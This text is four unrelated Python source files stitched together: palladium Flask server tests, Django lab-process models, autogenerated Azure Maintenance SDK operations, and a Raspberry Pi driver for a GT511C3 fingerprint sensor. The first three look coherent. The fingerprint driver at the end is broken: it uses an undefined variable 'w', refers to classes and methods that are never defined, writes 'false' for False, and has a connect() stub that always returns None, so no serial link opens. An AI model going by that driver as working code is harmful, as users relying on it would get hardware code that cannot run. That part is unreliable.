class TestUpdateModelCacheFunctional:
@pytest.fixture
def update_model_cache(self):
from palladium.server import update_model_cache
return update_model_cache
@pytest.fixture
def jobs(self, process_store):
jobs = process_store['process_metadata'].setdefault('jobs', {})
yield jobs
jobs.clear()
def test_success(self, update_model_cache, config, jobs, flask_app):
model_persister = Mock()
config['model_persister'] = model_persister
with flask_app.test_request_context(method='POST'):
resp = update_model_cache()
sleep(0.02)
resp_json = json.loads(resp.get_data(as_text=True))
job = jobs[resp_json['job_id']]
assert job['status'] == 'finished'
assert job['info'] == repr(model_persister.update_cache())
def test_unavailable(self, update_model_cache, config, jobs, flask_app):
model_persister = Mock()
del model_persister.update_cache
config['model_persister'] = model_persister
with flask_app.test_request_context(method='POST'):
resp = update_model_cache()
assert resp.status_code == 503
class TestActivateFunctional:
@pytest.fixture
def activate(self):
from palladium.server import activate
return activate
@pytest.fixture
def activate_base_mock(self, monkeypatch):
func = Mock()
monkeypatch.setattr('palladium.server.activate_base', func)
return func
def test_success(self, activate, activate_base_mock, config, flask_app):
model_persister = Mock(
list_models=lambda: {'be': 'first'},
list_properties=lambda: {'be': 'twice'},
)
config['model_persister'] = model_persister
with flask_app.test_request_context(
method='POST',
data={'model_version': 123},
):
resp = activate()
assert resp.status_code == 200
assert resp.json == {
'models': {'be': 'first'},
'properties': {'be': 'twice'},
}
def test_lookuperror(self, activate, activate_base_mock, flask_app):
activate_base_mock.side_effect = LookupError
with flask_app.test_request_context(
method='POST',
data={'model_version': 123},
):
resp = activate()
assert resp.status_code == 503
def _test_add_url_rule_func():
return b'A OK'
class TestAddUrlRule:
@pytest.fixture
def add_url_rule(self):
from palladium.server import add_url_rule
return add_url_rule
def test_it(self, add_url_rule, flask_client):
add_url_rule(
'/okay',
view_func='palladium.tests.test_server._test_add_url_rule_func',
)
resp = flask_client.get('/okay')
assert resp.data == b'A OK'
| |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
import datetime
import os
from django.core.files.storage import default_storage as labshare
from django.conf import settings
from django.db import models
from django.dispatch import receiver
from django.utils.encoding import python_2_unicode_compatible
from actstream import action
from mptt import models as mptt
from polymorphic.models import PolymorphicModel
from simple_history import models as simple_history
from core.models.mixins import TimestampMixin, UUIDMixin
from core.models import fields, Investigation, Milestone
def get_file_path(instance, filename):
"""
Stores files in /process_data and generates a UUID-based file name
"""
return os.path.join('processes', instance.process.uuid_full.hex, filename)
@python_2_unicode_compatible
class ProcessCategory(models.Model):
"""Holds information about the category of process types."""
slug = models.SlugField(primary_key=True, max_length=100, default='uncategorized')
name = models.CharField(max_length=100)
description = models.TextField(blank=True)
class Meta:
verbose_name = 'process category'
verbose_name_plural = 'process categories'
def __repr__(self):
return '<{}: {}>'.format(self.__class__.__name__, self.slug)
def __str__(self):
return self.name
def processtype_slugs(self):
return self.processtypes.values_list('type', flat=True)
@python_2_unicode_compatible
class ProcessType(models.Model):
"""
Holds information about types of processes.
"""
SCHEDULING_TYPE = (
('none', 'None'),
('simple', 'Simple'),
('full', 'Full'),
('external', 'External'),
)
CREATION_TYPE = (
('default', 'Default'),
('custom', 'Custom'),
)
type = models.SlugField(primary_key=True, max_length=100, default='generic-process')
name = models.CharField(max_length=100)
full_name = models.CharField(max_length=255)
is_destructive = models.BooleanField(default=True)
description = models.TextField(blank=True)
scheduling_type = models.CharField(max_length=10, choices=SCHEDULING_TYPE,
default='none')
creation_type = models.CharField(max_length=10, choices=CREATION_TYPE,
default='default')
category = models.ForeignKey(ProcessCategory, default='uncategorized',
related_name='processtypes',
related_query_name='processtype')
def get_absolute_url(self):
return '/process/type/{}'.format(self.type)
def __repr__(self):
return '<{}: {}>'.format(self.__class__.__name__, self.type)
def __str__(self):
return self.full_name
class ProcessTypeManager(models.Manager):
"""
Manager to filter on the ``type`` field.
"""
def __init__(self, process_type):
super(ProcessTypeManager, self).__init__()
self.process_type = process_type
def get_queryset(self):
return (super(ProcessTypeManager, self)
.get_queryset().filter(type_id=self.process_type))
class Process(UUIDMixin, TimestampMixin, models.Model):
"""
A process represents anything done to a sample which results in data
(numerical or visual) or alters the properties of the sample.
"""
prefix = 'p'
title = models.CharField(max_length=80)
comment = fields.RichTextField(blank=True)
legacy_identifier = models.SlugField(max_length=100)
user = models.ForeignKey(settings.AUTH_USER_MODEL,
limit_choices_to={'is_active': True})
run_date = models.DateField(default=datetime.date.today, blank=True)
type = models.ForeignKey(ProcessType, default='generic-process')
investigations = models.ManyToManyField(Investigation,
related_name='processes', related_query_name='process',)
milestones = models.ManyToManyField(Milestone,
related_name='processes', related_query_name='milestone',)
history = simple_history.HistoricalRecords()
objects = models.Manager()
generic = ProcessTypeManager(process_type='generic-process')
split = ProcessTypeManager(process_type='split-process')
class Meta:
verbose_name = 'process'
verbose_name_plural = 'processes'
def get_absolute_url(self):
return '/process/{}'.format(self.uuid)
@property
def samples(self):
"""
Retrieve a queryset of samples that have the process run on them.
"""
from core.models import Sample
trees = ProcessNode.objects.filter(process=self).values_list('tree_id', flat=True)
nodes = (ProcessNode.objects.filter(tree_id__in=trees,
sample__isnull=False)
.values_list('sample', flat=True))
return Sample.objects.filter(id__in=nodes).distinct()
@property
def nodes(self):
return self.processnode_set.all()
class ProcessNode(mptt.MPTTModel, UUIDMixin, TimestampMixin):
"""
Model representing the nodes in a tree of various processes done to
a sample.
"""
prefix = 'n'
comment = fields.RichTextField(blank=True)
parent = mptt.TreeForeignKey('self', null=True, related_name='children')
process = models.ForeignKey(Process, null=True)
piece = models.CharField(max_length=5)
number = models.IntegerField(default=1)
objects = mptt.TreeManager()
def get_sample(self):
return self.get_root().sample
def swap_processes(self, other):
tmp = self.process_id
self.process_id = other.process_id
other.process_id = tmp
self.save()
other.save()
class DataFile(PolymorphicModel, TimestampMixin):
"""
Generic model for files associated with processes
"""
partial_template = 'core/generic_file_partial.html'
DATA_STATE = [
('raw', 'Raw'),
('cleaned', 'Cleaned'),
('extracted', 'Extracted'),
('analyzed', 'Analyzed'),
('other', 'Other')
]
CONTENT_TYPE = [
('', 'Unknown'),
('application/octet-stream', 'Binary File'),
('application/pdf', 'PDF File'),
('application/vnd.ms-excel', 'Excel File'),
('application/vnd.openxmlformats-officedocument.spreadsheetml.sheet', 'Excel File'),
('image/png', 'PNG Image'),
('image/bmp', 'BMP Image'),
('image/jpeg', 'JPEG Image'),
('image/tiff', 'TIFF Image'),
('image/gif', 'GIF Image'),
('text/plain', 'Plaintext File'),
('text/csv', 'CSV File'),
]
process = models.ForeignKey(Process,
related_name='datafiles',
related_query_name='datafiles',
null=True)
content_type = models.CharField(max_length=200, blank=True, choices=CONTENT_TYPE, default='')
data = models.FileField(upload_to=get_file_path, storage=labshare,
max_length=200, blank=True, null=True)
state = models.CharField(max_length=20, choices=DATA_STATE, default='raw')
class ProcessTemplate(TimestampMixin, models.Model):
"""
Model for templating existing process details for later reference
"""
process = models.ForeignKey(Process,
related_name='templates',
related_query_name='templates')
name = models.CharField(max_length=50, blank=True)
title = models.CharField(max_length=80)
comment = fields.RichTextField(blank=True)
user = models.ForeignKey(settings.AUTH_USER_MODEL,
limit_choices_to={'is_active': True})
@receiver(models.signals.m2m_changed, sender=Process.investigations.through)
def process_actstream(sender, instance=None, created=False, **kwargs):
for investigation in instance.investigations.all():
action.send(instance.user,
verb='created',
action_object=instance,
target=investigation)
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class ApplyUpdatesOperations(object):
"""ApplyUpdatesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.maintenance.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def get_parent(
self,
resource_group_name, # type: str
resource_parent_type, # type: str
resource_parent_name, # type: str
provider_name, # type: str
resource_type, # type: str
resource_name, # type: str
apply_update_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.ApplyUpdate"
"""Track Updates to resource with parent.
Track maintenance updates to resource with parent.
:param resource_group_name: Resource group name.
:type resource_group_name: str
:param resource_parent_type: Resource parent type.
:type resource_parent_type: str
:param resource_parent_name: Resource parent identifier.
:type resource_parent_name: str
:param provider_name: Resource provider name.
:type provider_name: str
:param resource_type: Resource type.
:type resource_type: str
:param resource_name: Resource identifier.
:type resource_name: str
:param apply_update_name: applyUpdate Id.
:type apply_update_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ApplyUpdate, or the result of cls(response)
:rtype: ~azure.mgmt.maintenance.models.ApplyUpdate
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ApplyUpdate"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-09-01-preview"
accept = "application/json"
# Construct URL
url = self.get_parent.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'resourceParentType': self._serialize.url("resource_parent_type", resource_parent_type, 'str'),
'resourceParentName': self._serialize.url("resource_parent_name", resource_parent_name, 'str'),
'providerName': self._serialize.url("provider_name", provider_name, 'str'),
'resourceType': self._serialize.url("resource_type", resource_type, 'str'),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
'applyUpdateName': self._serialize.url("apply_update_name", apply_update_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.MaintenanceError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ApplyUpdate', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_parent.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{providerName}/{resourceParentType}/{resourceParentName}/{resourceType}/{resourceName}/providers/Microsoft.Maintenance/applyUpdates/{applyUpdateName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
provider_name, # type: str
resource_type, # type: str
resource_name, # type: str
apply_update_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.ApplyUpdate"
"""Track Updates to resource.
Track maintenance updates to resource.
:param resource_group_name: Resource group name.
:type resource_group_name: str
:param provider_name: Resource provider name.
:type provider_name: str
:param resource_type: Resource type.
:type resource_type: str
:param resource_name: Resource identifier.
:type resource_name: str
:param apply_update_name: applyUpdate Id.
:type apply_update_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ApplyUpdate, or the result of cls(response)
:rtype: ~azure.mgmt.maintenance.models.ApplyUpdate
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ApplyUpdate"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-09-01-preview"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'providerName': self._serialize.url("provider_name", provider_name, 'str'),
'resourceType': self._serialize.url("resource_type", resource_type, 'str'),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
'applyUpdateName': self._serialize.url("apply_update_name", apply_update_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.MaintenanceError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ApplyUpdate', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{providerName}/{resourceType}/{resourceName}/providers/Microsoft.Maintenance/applyUpdates/{applyUpdateName}'} # type: ignore
def create_or_update_parent(
self,
resource_group_name, # type: str
provider_name, # type: str
resource_parent_type, # type: str
resource_parent_name, # type: str
resource_type, # type: str
resource_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.ApplyUpdate"
"""Apply Updates to resource with parent.
Apply maintenance updates to resource with parent.
:param resource_group_name: Resource group name.
:type resource_group_name: str
:param provider_name: Resource provider name.
:type provider_name: str
:param resource_parent_type: Resource parent type.
:type resource_parent_type: str
:param resource_parent_name: Resource parent identifier.
:type resource_parent_name: str
:param resource_type: Resource type.
:type resource_type: str
:param resource_name: Resource identifier.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ApplyUpdate, or the result of cls(response)
:rtype: ~azure.mgmt.maintenance.models.ApplyUpdate
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ApplyUpdate"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-09-01-preview"
accept = "application/json"
# Construct URL
url = self.create_or_update_parent.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'providerName': self._serialize.url("provider_name", provider_name, 'str'),
'resourceParentType': self._serialize.url("resource_parent_type", resource_parent_type, 'str'),
'resourceParentName': self._serialize.url("resource_parent_name", resource_parent_name, 'str'),
'resourceType': self._serialize.url("resource_type", resource_type, 'str'),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.put(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.MaintenanceError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ApplyUpdate', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update_parent.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{providerName}/{resourceParentType}/{resourceParentName}/{resourceType}/{resourceName}/providers/Microsoft.Maintenance/applyUpdates/default'} # type: ignore
def create_or_update(
self,
resource_group_name, # type: str
provider_name, # type: str
resource_type, # type: str
resource_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.ApplyUpdate"
"""Apply Updates to resource.
Apply maintenance updates to resource.
:param resource_group_name: Resource group name.
:type resource_group_name: str
:param provider_name: Resource provider name.
:type provider_name: str
:param resource_type: Resource type.
:type resource_type: str
:param resource_name: Resource identifier.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ApplyUpdate, or the result of cls(response)
:rtype: ~azure.mgmt.maintenance.models.ApplyUpdate
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ApplyUpdate"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-09-01-preview"
accept = "application/json"
# Construct URL
url = self.create_or_update.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'providerName': self._serialize.url("provider_name", provider_name, 'str'),
'resourceType': self._serialize.url("resource_type", resource_type, 'str'),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.put(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.MaintenanceError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ApplyUpdate', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{providerName}/{resourceType}/{resourceName}/providers/Microsoft.Maintenance/applyUpdates/default'} # type: ignore
def list(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.ListApplyUpdate"]
"""Get Configuration records within a subscription.
Get Configuration records within a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ListApplyUpdate or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.maintenance.models.ListApplyUpdate]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ListApplyUpdate"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-09-01-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ListApplyUpdate', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.MaintenanceError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Maintenance/applyUpdates'} # type: ignore
| |
'''
Ashwin Ahuja - ashhwin.ahuja@gmail.com
December 2015
This code is published under the MIT License, please look at the main folder for more information
This code makes use of the module obtained from SparkFun - the GT511C3 - and makes lots of use of the
library for arduino provided by them - hence, please look at this.
This code has been tested on a Raspberry Pi 2 B, however, will in finality be used with a Raspberry Pi
Zero, so code has been designed to work with both of these.
This inherits majorly from Jean Machuca's attempts to do the same - please look at his library as well
'''
'''
Connections are as follows:
FP (Fingerprint Sensor) TX - RXD of Raspberry Pi GPIO
FP (Fingerprint Sensor) RX - TXD of Raspberry Pi GPIO
VCC of Fingerprint Sensor - 3V3 of Raspberry Pi GPIO
GND of Fingerprint Sensor - GND of Raspberry Pi GPIO
'''
import os
import serial
import time
import binascii
def delay(milliseconds):
#allows me to maximise the code that can be lifted directly from the sparkfun library
time.sleep(milliseconds)
deviceName = '/dev/cu.usbserial-A601EQ14' #this is the Pi Serial Connection
class packet:
byte1 = 0x55;
byte2 = 0xAA;
bytedevid1 = 0x01;
bytedevid2 = 0x00;
def returnHighByte(self, word):
return (w>>8)&0x00FF
def returnLowByte (self, word):
return w&0x00FF
def CalculateCheckSum(self,bytearr):
return sum(map(ord,bytes(bytearr)))
def serializeToSend(self,bytearr):
return ' '.join(binascii.hexlify(ch) for ch in bytes(bytearr))
class commandpacket(packet):
cmd = ''
command = bytearray(2)
commands = {
'NotSet' : 0x00, # Default value for enum. Scanner will return error if sent this.
'Open' : 0x01, # Open Initialization
'Close' : 0x02, # Close Termination
'UsbInternalCheck' : 0x03, # UsbInternalCheck Check if the connected USB device is valid
'ChangeBaudrate' : 0x04, # ChangeBaudrate Change UART baud rate
'SetIAPMode' : 0x05, # SetIAPMode Enter IAP Mode In this mode, FW Upgrade is available
'CmosLed' : 0x12, # CmosLed Control CMOS LED
'GetEnrollCount' : 0x20, # Get enrolled fingerprint count
'CheckEnrolled' : 0x21, # Check whether the specified ID is already enrolled
'EnrollStart' : 0x22, # Start an enrollment
'Enroll1' : 0x23, # Make 1st template for an enrollment
'Enroll2' : 0x24, # Make 2nd template for an enrollment
'Enroll3' : 0x25, # Make 3rd template for an enrollment, merge three templates into one template, save merged template to the database
'IsPressFinger' : 0x26, # Check if a finger is placed on the sensor
'DeleteID' : 0x40, # Delete the fingerprint with the specified ID
'DeleteAll' : 0x41, # Delete all fingerprints from the database
'Verify1_1' : 0x50, # Verification of the capture fingerprint image with the specified ID
'Identify1_N' : 0x51, # Identification of the capture fingerprint image with the database
'VerifyTemplate1_1' : 0x52, # Verification of a fingerprint template with the specified ID
'IdentifyTemplate1_N' : 0x53, # Identification of a fingerprint template with the database
'CaptureFinger' : 0x60, # Capture a fingerprint image(256x256) from the sensor
'MakeTemplate' : 0x61, # Make template for transmission
'GetImage' : 0x62, # Download the captured fingerprint image(256x256)
'GetRawImage' : 0x63, # Capture & Download raw fingerprint image(320x240)
'GetTemplate' : 0x70, # Download the template of the specified ID
'SetTemplate' : 0x71, # Upload the template of the specified ID
'GetDatabaseStart' : 0x72, # Start database download, obsolete
'GetDatabaseEnd' : 0x73, # End database download, obsolete
'UpgradeFirmware' : 0x80, # Not supported
'UpgradeISOCDImage' : 0x81, # Not supported
'Ack' : 0x30, # Acknowledge.
'Nack' : 0x31 # Non-acknowledge
}
def __init__(self,*args,**kwargs):
commandName=args[0]
kwargs.setdefault('UseSerialDebug', True)
self.UseSerialDebug= kwargs['UseSerialDebug']
if self.UseSerialDebug:
print 'Command: %s' % commandName
self.cmd = self.commands[commandName]
UseSerialDebug = True
Parameter = bytearray(4)
def GetPacketBytes(self):
self.command[0] = self.GetLowByte(self.cmd)
self.command[1] = self.GetHighByte(self.cmd)
packetbytes= bytearray(12)
packetbytes[0] = self.COMMAND_START_CODE_1
packetbytes[1] = self.COMMAND_START_CODE_2
packetbytes[2] = self.COMMAND_DEVICE_ID_1
packetbytes[3] = self.COMMAND_DEVICE_ID_2
packetbytes[4] = self.Parameter[0]
packetbytes[5] = self.Parameter[1]
packetbytes[6] = self.Parameter[2]
packetbytes[7] = self.Parameter[3]
packetbytes[8] = self.command[0]
packetbytes[9] = self.command[1]
chksum = self.CalculateCheckSum(packetbytes[0:9])
packetbytes[10] = self.GetLowByte(chksum)
packetbytes[11] = self.GetHighByte(chksum)
return packetbytes;
def ParameterFromInt(self, i):
self.Parameter[0] = (i & 0x000000ff);
self.Parameter[1] = (i & 0x0000ff00) >> 8;
self.Parameter[2] = (i & 0x00ff0000) >> 16;
self.Parameter[3] = (i & 0xff000000) >> 24;
class Response_Packet(Packet):
'''
Response Packet Class
'''
errors = {
'NO_ERROR' : 0x0000, # Default value. no error
'NACK_TIMEOUT' : 0x1001, # Obsolete, capture timeout
'NACK_INVALID_BAUDRATE' : 0x1002, # Obsolete, Invalid serial baud rate
'NACK_INVALID_POS' : 0x1003, # The specified ID is not between 0~199
'NACK_IS_NOT_USED' : 0x1004, # The specified ID is not used
'NACK_IS_ALREADY_USED' : 0x1005, # The specified ID is already used
'NACK_COMM_ERR' : 0x1006, # Communication Error
'NACK_VERIFY_FAILED' : 0x1007, # 1:1 Verification Failure
'NACK_IDENTIFY_FAILED' : 0x1008, # 1:N Identification Failure
'NACK_DB_IS_FULL' : 0x1009, # The database is full
'NACK_DB_IS_EMPTY' : 0x100A, # The database is empty
'NACK_TURN_ERR' : 0x100B, # Obsolete, Invalid order of the enrollment (The order was not as: EnrollStart -> Enroll1 -> Enroll2 -> Enroll3)
'NACK_BAD_FINGER' : 0x100C, # Too bad fingerprint
'NACK_ENROLL_FAILED' : 0x100D, # Enrollment Failure
'NACK_IS_NOT_SUPPORTED' : 0x100E, # The specified command is not supported
'NACK_DEV_ERR' : 0x100F, # Device Error, especially if Crypto-Chip is trouble
'NACK_CAPTURE_CANCELED' : 0x1010, # Obsolete, The capturing is canceled
'NACK_INVALID_PARAM' : 0x1011, # Invalid parameter
'NACK_FINGER_IS_NOT_PRESSED' : 0x1012, # Finger is not pressed
'INVALID' : 0XFFFF # Used when parsing fails
}
def __init__(self,_buffer=None,UseSerialDebug=False):
'''
creates and parses a response packet from the finger print scanner
'''
self.UseSerialDebug= UseSerialDebug
if not (_buffer is None ):
self.RawBytes = _buffer
self._lastBuffer = bytes(_buffer)
if self.UseSerialDebug:
print 'readed: %s'% self.serializeToSend(_buffer)
if _buffer.__len__()>=12:
self.ACK = True if _buffer[8] == 0x30 else False
self.ParameterBytes[0] = _buffer[4]
self.ParameterBytes[1] = _buffer[5]
self.ParameterBytes[2] = _buffer[6]
self.ParameterBytes[3] = _buffer[7]
self.ResponseBytes[0] = _buffer[8]
self.ResponseBytes[1] = _buffer[9]
self.Error = self.ParseFromBytes(self.GetHighByte(_buffer[5]),self.GetLowByte(_buffer[4]))
_lastBuffer = bytes()
RawBytes = bytearray(12)
ParameterBytes=bytearray(4)
ResponseBytes=bytearray(2)
ACK = False
Error = None
UseSerialDebug = True
def ParseFromBytes(self,high,low):
'''
parses bytes into one of the possible errors from the finger print scanner
'''
e = 'INVALID'
if high == 0x01:
if low in self.errors.values():
errorIndex = self.errors.values().index(low)
e = self.errors.keys()[errorIndex]
return e
def IntFromParameter(self):
retval = 0;
retval = (retval << 8) + self.ParameterBytes[3];
retval = (retval << 8) + self.ParameterBytes[2];
retval = (retval << 8) + self.ParameterBytes[1];
retval = (retval << 8) + self.ParameterBytes[0];
return retval;
class SerialCommander:
def __serialize_args_hex__(self,*arg,**kwargs):
return bytes(bytearray([v for v in kwargs.values()]))
def serializeToSend(self,bytearr):
return ' '.join(binascii.hexlify(ch) for ch in bytes(bytearr))
def unserializeFromRead(self,char_readed,bytearr):
bytearr.append(char_readed)
return bytearr
def connect(device_name=None,baud=None,timeout=None,is_com=True):
_ser = None
is_com = false
baud = 9600
device_name = '/dev/ttyAMA0'
timeout = 2000
return _ser
BAUD = 9600
class fingerprintseonsor(SerialCommander):
_serial = None
_lastResponse = None
_device_name = None
_baud = None
_timeout= None
UseSerialDebug = True
def __init__(self,device_name=None,baud=None,timeout=None,is_com=True):
self._device_name = device_name
self._baud=baud
self._timeout = timeout
self._serial = connect(device_name,baud,timeout,is_com=is_com)
if not self._serial is None:
delay(0.1)
self.Open()
elif self.UseSerialDebug:
print 'No connection with this device:- %s' % self._device_name
def Open(self):
self.ChangeBaudRate(BAUD)
delay(0.1)
cp = Command_Packet('Open',UseSerialDebug=self.UseSerialDebug)
cp.ParameterFromInt(1)
packetbytes = cp.GetPacketBytes()
self.SendCommand(packetbytes, 12)
rp = self.GetResponse()
del packetbytes
return rp.ACK
def Close(self):
cp = Command_Packet('Close',UseSerialDebug=self.UseSerialDebug)
cp.Parameter[0] = 0x00;
cp.Parameter[1] = 0x00;
cp.Parameter[2] = 0x00;
cp.Parameter[3] = 0x00;
packetbytes = cp.GetPacketBytes()
self.SendCommand(packetbytes, 12)
rp = self.GetResponse()
if not self._serial is None:
self._serial.close()
del packetbytes
